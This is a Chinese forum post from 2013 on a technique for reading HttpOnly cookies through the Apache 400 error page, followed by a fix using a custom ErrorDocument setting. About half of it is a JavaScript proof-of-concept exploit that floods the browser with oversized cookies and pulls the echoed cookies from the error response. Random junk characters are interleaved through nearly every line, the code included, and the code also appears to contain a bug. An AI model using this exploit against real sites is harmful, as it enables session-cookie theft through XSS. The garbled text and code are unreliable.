很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。5 ^& L: e' Y2 M4 S' R/ p, U
/ E; n; X+ G8 J }' w
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:% }4 u: [+ B1 v2 ~ g
+ v9 d2 O# g" T6 n4 @- |0 a
# ?+ d9 M6 Z7 ?8 K" n// http://www.exploit-db.com/exploits/18442/
0 ]' @; S9 N7 G Y0 ]: tfunction setCookies (good) {/ U9 s; {3 Y* L, I7 C
// Construct string for cookie value# L3 ?( M0 c$ j. u+ y+ n
var str = "";
9 L; l5 ?; G/ }for (var i=0; i< 819; i++) {3 A+ Y9 i& B& v V! r
str += "x";
5 s( N9 U# ^& H% c}
: h# S' Z+ T0 g) k3 t4 S. v// Set cookies
J2 ~5 K+ t) P( ]9 S" o7 pfor (i = 0; i < 10; i++) {+ ]6 S+ z$ P* a! F9 `7 V
// Expire evil cookie1 R- C$ p, X7 H5 \" C
if (good) {
& T) o9 j: a: j) Hvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";* U' D6 V& E7 X. F Y6 ~$ o
}
6 V- I% q" F2 \, I( P// Set evil cookie
6 r. f+ j U* A# j& C: ^else {( M1 J+ ~- @( ~( A8 c
var cookie = "xss"+i+"="+str+";path=/";2 L, G- O2 D1 D9 V
}
; ]4 k# C; r: P9 f7 i" qdocument.cookie = cookie;
( J7 L. s6 Z$ s- |) J+ O" Y}
; w9 _0 ^, R- H& h% i0 L" s" i4 c9 C}
- I: v, l7 R# f) W$ Mfunction makeRequest() {
' z1 B6 Z9 f# z# D; L$ F, `, NsetCookies();0 x. ^" S" s& A2 d. p% r$ N, `$ d& @
function parseCookies () {8 P- U. O. o1 V! G7 @2 \( R4 u
var cookie_dict = {};3 Q& A( k& M" r. D: k- l: N
// Only react on 400 status% v q0 a' A! x; J8 e
if (xhr.readyState === 4 && xhr.status === 400) {
' r* z4 q. b% Y& {// Replace newlines and match <pre> content
# ]5 b- q! G `# R& [: W1 N: @var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);2 _0 B( Q) s) `1 n$ f$ @
if (content.length) {( {5 j& f' z! O! K- B2 X( Z
// Remove Cookie: prefix( [0 G+ l2 |+ E' h
content = content[1].replace("Cookie: ", "");( q4 y0 Q' t( `5 b' X
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);, \, a9 z# D# Q+ Z- Y( J
// Add cookies to object) } h, g9 h0 Z' |
for (var i=0; i<cookies.length; i++) {3 ~" s1 M0 S7 |% C) U. y
var s_c = cookies.split('=',2);
9 E0 t! ?5 n3 a+ U# {! ~& R: [cookie_dict[s_c[0]] = s_c[1];. ]7 z0 a9 m `
}, W, `' }. ~1 n" C U# q( d
}
: m) p' ]6 S. J, ]4 e1 R// Unset malicious cookies5 g; u8 Z' e+ r+ |, T- ^: `5 k
setCookies(true);6 e$ q2 G% Y$ s% K7 z) g
alert(JSON.stringify(cookie_dict));
0 x# ]4 J0 g, E0 V' R}/ U7 R, r1 Z& W5 N8 l% G( v
}( }* W/ V0 ?$ J' q0 a
// Make XHR request3 K: J6 u; t$ t/ t7 [ r2 F
var xhr = new XMLHttpRequest();
7 v, X; T1 j: n# Cxhr.onreadystatechange = parseCookies;3 C+ k5 f$ v- `- g5 s: x
xhr.open("GET", "/", true);
( O1 P9 Q8 R7 y9 o5 m2 m1 nxhr.send(null);
8 N0 V* R* Z1 q8 |+ [' z}# z* ~" S8 j. f! c \4 V
makeRequest();6 p: L2 `8 J. ]
. P3 R0 C- T: [
你就能看见华丽丽的400错误包含着cookie信息。* R& Y4 c+ H/ m% u
) W; q) J7 I" |% P T% b$ E/ \下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#& p: J# H5 v3 O% [
& D( S3 M; E, q修复方案:
8 \+ F# a; I1 t
1 S0 }, Y" t% N: xApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下! q: {/ O+ l/ e
B7 u) M9 N* t8 z* G3 n, s
In the event of a problem or error, Apachecan be configured to do one of four things,. ?1 x8 V$ N/ K1 s3 D/ m
v* s$ I' O4 I4 j. L& n/ ]1. output asimple hardcoded error message输出一个简单生硬的错误代码信息+ `. c+ F! v0 v) \- @: [" G6 e
2. output acustomized message输出一段信息
: W: I- a- e, H- {0 T) g3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
" l5 K- b' i: J% e) h4 m4. redirect to an external URL to handle theproblem/error转向一个外部URL
8 n4 B" p0 `8 a. s; G+ t% e+ L1 v5 n3 r# l; J' ]5 F
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容( w L& w4 B. w* m
/ J1 P: w' f0 C5 j) \
Apache配置:
; t/ E& C- k6 z( w! J
+ L( ]7 z' T# z1 F3 fErrorDocument400 " security test"/ f9 t4 v+ f+ A0 X* S) \5 W
6 h$ b% u' s3 w. X2 `4 H& K
当然,升级apache到最新也可:)。+ H8 Y6 F& A" K
8 h* C- x% E0 o) X, z8 }% k参考:http://httpd.apache.org/security/vulnerabilities_22.html& j* S+ ~ P6 r2 w8 ]0 \# _' j- k! \
% C" y) \1 h+ {' i8 Z |
发表于 2013-4-19 19:15:43
收藏
支持
反对